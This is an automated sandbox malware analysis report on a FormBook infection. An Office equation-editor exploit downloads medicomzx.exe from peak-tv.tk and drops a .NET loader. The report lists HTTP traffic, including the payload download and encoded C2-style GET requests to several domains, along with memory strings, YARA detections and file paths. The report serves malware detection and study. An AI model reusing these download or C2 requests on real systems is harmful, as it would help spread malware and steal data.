0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2e 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2f 00 00 0a 6f 30 00 00 0a 73 31 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00
          Source: global trafficHTTP traffic detected: GET /medicomzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: peak-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Jan 2022 17:18:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 179X-Sorting-Hat-ShopId: 59690647732X-Dc: gcp-europe-west1X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6cd048db19b64333-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 13 Jan 2022 17:18:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://led24.de/iconset/
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://p.yusukekamiyamane.com/
          Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.427812098.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://splashyfish.com/icons/
          Source: explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431896377.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://www.fatcow.com/free-icons/
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://www.gnome.org/
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp01l
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.512214030.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea
          Source: explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://www.small-icons.com/packs/16x16-free-application-icons.htm
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.434207540.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.445067687.000000000031D000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: medicomsh78694.exeString found in binary or memory: https://github.com/proviq/lusrmgr
          Source: medicomsh78694.exeString found in binary or memory: https://github.com/proviq/lusrmgr/
          Source: medicomsh78694.exe, 00000004.00000002.423480427.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000004.00000000.408501370.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: https://github.com/proviq/lusrmgr/Chttps://github.com/proviq/lusrmgr
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: https://visualpharm.com/must_have_icon_set/
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: peak-tv.tk
          Source: global trafficHTTP traffic detected: GET /medicomzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: peak-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1Host: www.prestigiousuniforms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1Host: www.muzicalbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1Host: www.extraordinarymiracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1Host: www.realstakepool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\medicomsh78694.exeJump to dropped file
          .NET source code contains very large stringsShow sources
          Source: medicomzx[1].exe.2.dr, MainForm.csLong String: Length: 22528
          Source: medicomsh78694.exe.2.dr, MainForm.csLong String: Length: 22528
          Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.csLong String: Length: 22528
          Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.csLong String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.csLong String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.csLong String: Length: 22528
          Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.csLong String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.csLong String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.csLong String: Length: 22528
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
